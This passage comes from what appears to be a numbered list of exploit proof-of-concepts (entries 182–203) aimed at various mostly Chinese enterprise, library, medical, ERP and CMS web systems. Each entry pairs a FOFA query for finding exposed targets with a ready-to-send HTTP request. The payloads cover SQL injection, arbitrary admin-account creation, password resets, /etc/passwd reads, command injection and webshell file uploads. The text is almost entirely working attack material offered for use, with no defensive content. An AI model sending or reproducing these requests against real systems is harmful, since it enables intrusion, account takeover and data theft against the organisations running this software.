Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. Runshen (润申科技) enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
FOFA: "PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. Guangzhou Tuchuang (广州图创) Interlib library cluster management system updOpuserPw SQL injection
FOFA: body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. Xunrao (迅饶科技) X2Modbus gateway AddUser arbitrary user addition
FOFA: server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. Realor Tianyi (瑞友天翼) application virtualization system SQL injection
version < 7.0.5.1
FOFA: app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power generation systems.
FOFA: title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA: "Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. Santi Jiahui (叁体-佳会) video conferencing attachment arbitrary file read
version <= 3.9.7
FOFA: body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技 clinical browsing system deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. Short-video matrix marketing system (短视频矩阵营销系统) poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. 亿赛通 electronic document security management system NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
public bool IsReusable
{ get { return true; } }
public void ProcessRequest(HttpContext ctx)
{
ctx.Response.Write("test");
}
}

193. 山石网科云鉴 security management system setsystemtimeaction command execution
FOFA:body="山石云鉴主机安全管理系统"
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0


POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')


GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. 飞企互联-FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the vulnerability exists.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain
<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"
{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

195. 飞鱼星 internet access behavior management system send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. Henan 风速科技 unified authentication platform password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

198. 阿里云盘 (aliyundrive) WebDAV command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

199. Cockpit assetsmanager_upload interface file upload

1. Run the PoC to obtain the CSRF value and then the cookie, then upload and access the result:
GET /auth/login?to=/ HTTP/1.1

Response: 200, return value: csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT obtained in the previous step to get a cookie:

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, return value:
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/

Fofa:title="Authenticate Please!"
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"

-----------------------------36D28FBc36bd6feE7Fb3--


/storage/uploads/tttt.php

200. SeaCMS (海洋影视管理系统) dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. 方正 all-media news editing system binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

202. 微擎 system AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0


Replace the __VIEWSTATE and __EVENTVALIDATION values:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"

-----------------------------786435874t38587593865736587346567358735687--


/_data/Uploads/1123.txt

203. 红海云 EHR PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--